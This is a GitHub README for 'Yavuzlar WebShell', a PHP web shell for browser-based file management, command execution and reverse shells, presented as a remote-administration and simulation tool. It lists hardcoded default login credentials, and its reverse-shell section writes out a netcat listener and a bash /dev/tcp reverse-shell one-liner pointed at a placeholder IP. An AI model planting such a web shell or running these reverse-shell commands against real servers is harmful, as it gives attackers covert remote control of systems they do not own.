Skip to content

Discover Yavuzlar WebShell, a powerful web-based shell tool for file management, terminal access, and reverse shell operations. Learn how it enhances remote administration and cybersecurity simulations.

License

Notifications You must be signed in to change notification settings

RootShelll/Yavuzlar-WebShell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Yavuzlar WebShell - Web-based Shell for Cybersecurity

Yavuzlar WebShell

🚀 What is Yavuzlar WebShell? 🤔

Yavuzlar WebShell is a web-based shell application that allows you to manage server files, execute terminal commands, and use reverse shells—all from the comfort of your browser. It was built using PHP and CSS with a minimalist interface designed for remote administration and cybersecurity simulations.


🔑 Key Features

  • File Manager 📁: Easily upload, edit, delete, and download files securely over the web.
  • Terminal 🖥️: Execute system commands through a browser-based terminal.
  • Reverse Shell 🔄: Use reverse shell techniques for remote system control.
  • Directory Navigation 📂: Navigate directories and manage file permissions effortlessly.
  • Security 🔒: Requires user login for all operations, ensuring secure access.

🚀 Getting Started

📥 Installation

  1. Clone the repository:
    git clone https://github.com/RootShelll/Yavuzlar-WebShell.git
  2. Upload the files to your web server.
  3. Ensure PHP is installed and configured properly on your server.
  4. Open the WebShell in your browser.

🔑 Default Login Credentials

Username: admin
Password: R00t

⚠️ Important Note: Make sure your server is properly secured, and only authorized users have access to the WebShell.


🔧 Advanced Usage

If you're familiar with command-line tools, you can enhance your experience by using the terminal feature to run various system commands. For example:

ls -la  # List all files in the current directory
cat filename.txt  # Display the content of a text file

🔄 Reverse Shell Operations

Use the following commands to establish a reverse shell connection:

nc -lvp 4444  # Listen on port 4444 for incoming connections
bash -i >& /dev/tcp/your_ip/4444 0>&1  # Reverse shell with bash

📜 License

This project is licensed under the MIT License - see the LICENSE file for details.

📬 Contact

For support, open an issue or reach out via email: [email protected]

About

Discover Yavuzlar WebShell, a powerful web-based shell tool for file management, terminal access, and reverse shell operations. Learn how it enhances remote administration and cybersecurity simulations.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages